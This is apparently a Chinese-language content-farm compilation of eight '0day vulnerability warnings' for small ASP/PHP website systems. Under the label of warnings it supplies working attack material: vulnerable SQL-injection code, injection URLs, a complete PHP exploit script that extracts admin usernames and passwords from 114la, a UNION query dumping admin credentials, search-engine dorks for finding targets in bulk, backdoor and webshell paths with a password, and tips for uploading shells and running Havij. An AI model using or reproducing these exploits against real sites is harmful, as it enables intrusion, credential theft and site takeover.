今天小编在这给大家整理了阿曼达企业网站系统 cookie 注入漏洞0day漏洞预警,本文共8篇,我们一起来阅读吧!
篇1:阿曼达企业网站系统 cookie 注入漏洞0day漏洞预警
amanda/cg_ProductShow.asp
---------------------------------------------------------------
<%@ LANGUAGE = VBScript.Encode %>
<%
ShowSmallClassType=ShowSmallClassType_Article
dim ID
ID=trim(request(“ID”))
if ID=“” then
response.Redirect(“cg_Product.asp”)
end if
sql=“select * from cg_Product where ID=” & ID & “”
Set rs= Server.CreateObject(“ADODB.Recordset”)
rs.open sql,conn,1,3
if rs.bof and rs.eof then
response.write“”
else
rs(“Hits”)=rs(“Hits”)+1
rs.update
%>
------------------------------------------------------------
只过滤了 get post,存在 cookie 注射,注入中转即可,
阿曼达企业网站系统 cookie 注入漏洞0day漏洞预警
,
amanda/cg_ProductShow.asp
localhost/jmCook.asp?jmdcw=169%20and%201=1
篇2:CGSAIL网站管理系统 0day漏洞预警
<%
dim sql
dim rs
sql = “select * from [”&CgsailPrefix&“admin] where id=”&request(“id”)
Set rs = Server.CreateObject(“ADODB.RecordSet”)
rs.Open sql,conn,1,1
photo=trim(rs(“photo”))
%>
localhost/user_view.asp?id=1%20and%201=1
篇3:114啦注入0day批量漏洞预警
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
.04.02
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
if ($argc < 3) {
print_r($sbcopyright);
die;
}
ob_start();
$url = $argv[1];
$path= $argv[2];
$sock = fsockopen(“$url”, 80, $errno, $errstr, 30);
if (!$sock) die(“$errstr ($errno)n”);
$data = “username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~”;
fwrite($sock, “POST $path/feedback/feedback.php HTTP/1.1rn”);
fwrite($sock, “Accept: */*rn”);
fwrite($sock, “Referer: $url/#Mrn”);
fwrite($sock, “Accept-Language: zh-cnrn”);
fwrite($sock, “Content-Type: application/x-www-form-urlencodedrn”);
fwrite($sock, “Accept-Encoding: gzip, deflatern”);
fwrite($sock, “User-Agent: Mozillarn”);
fwrite($sock, “Host: $urlrn”);
fwrite($sock, “Content-Length: ”.strlen($data).“rn”);
fwrite($sock, “Connection: Keep-Alivern”);
fwrite($sock, “Cache-Control: no-cachern”);
fwrite($sock, “Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAONrnrn”);
fwrite($sock, $data);
$headers = “”;
while ($str = trim(fgets($sock, 4096)))
$headers .= “$strn”;
echo “n”;
$body = “”;
while (!feof($sock))
$body .= fgets($sock, 4096);
fclose($sock);
if (strpos($body, 'Duplicate entry') !== false) {
preg_match('/Duplicate entry '(.*)1'/', $body, $arr);
$result=explode(“_”,$arr[1]);
print_r(“Exploit Success! nusername:”.$result[0].“npassword:”.$result[1].“nGood Luck!”);
}else{
print_r(“Exploit Failed! n”);
}
ob_end_flush();
?>
篇4:86cms2011SP6 企业建站系统 0day漏洞预警
这个是比较无语的,跟之前发布出来的那套是一模一样的。。真不知道到底是谁在抄谁的
继续
直接利用就可以拿shell 了,
配置IIS6.0
关键词大家去找吧。。我不喜欢批量
篇5:天缘企业网站系统通杀0day漏洞预警
批量www.google.cn
inurl:Products.asp?main_id=1
自己注意找下后台,然后修改action=“”里的地址
EXp:
请输入你要创建管理员的名字
请输入你要创建管理员的密码
这个当然是确认密码了
Author:Lan3a
以上代码 保存为html或htm
篇6: 游戏网站程序0DAY漏洞预警
作者:amxking
挖掘:百事可乐
准确点应该算是backdoor
inurl:Find.asp 您的位置 >> 客服中心 >> 找回密码
直接传马:
www.XXX.com/user/situjiaduotu2.asp
一句话backdoor ,密码 : value
www.XXX.com/htmledit/Include/upfile_class.asp
www.XXX.com/htmleditIncludeDeCode.asp
读库提权:
D:webwww.xxx.comIncConfig.asp
篇7:CmsEasy易通企业网站系统注入漏洞漏洞预警
易通企业网站系统最新注入漏洞,
注入EXP:
www.xxx.com/celive/js/include.php?cmseasylive=1111&departmentid=0
直接放Havij里面跑,
错误关键字:online.gif
添加表名:cmseasy_user
列表:userid,username,password
百度关键字:Powered by CmsEasy
篇8:918企业营销网站展示系统注入漏洞漏洞预警
news_show.asp
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<%
id=request.QueryString(“id”)
k=request.QueryString(“k”)
%>
<%
set rs3=server.CreateObject(“adodb.recordset”)
sql3=“select * from hlf_news where id=”&id
rs3.open sql3,conn,1,1
if not rs3.eof then
%>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
127.0.0.1/news_show.asp?id=106union select 1,admin,3,4,password,6 from hlf_admin
★启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警
★淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警
★iShowMusic V1.2 写入shell漏洞漏洞预警
文档为doc格式
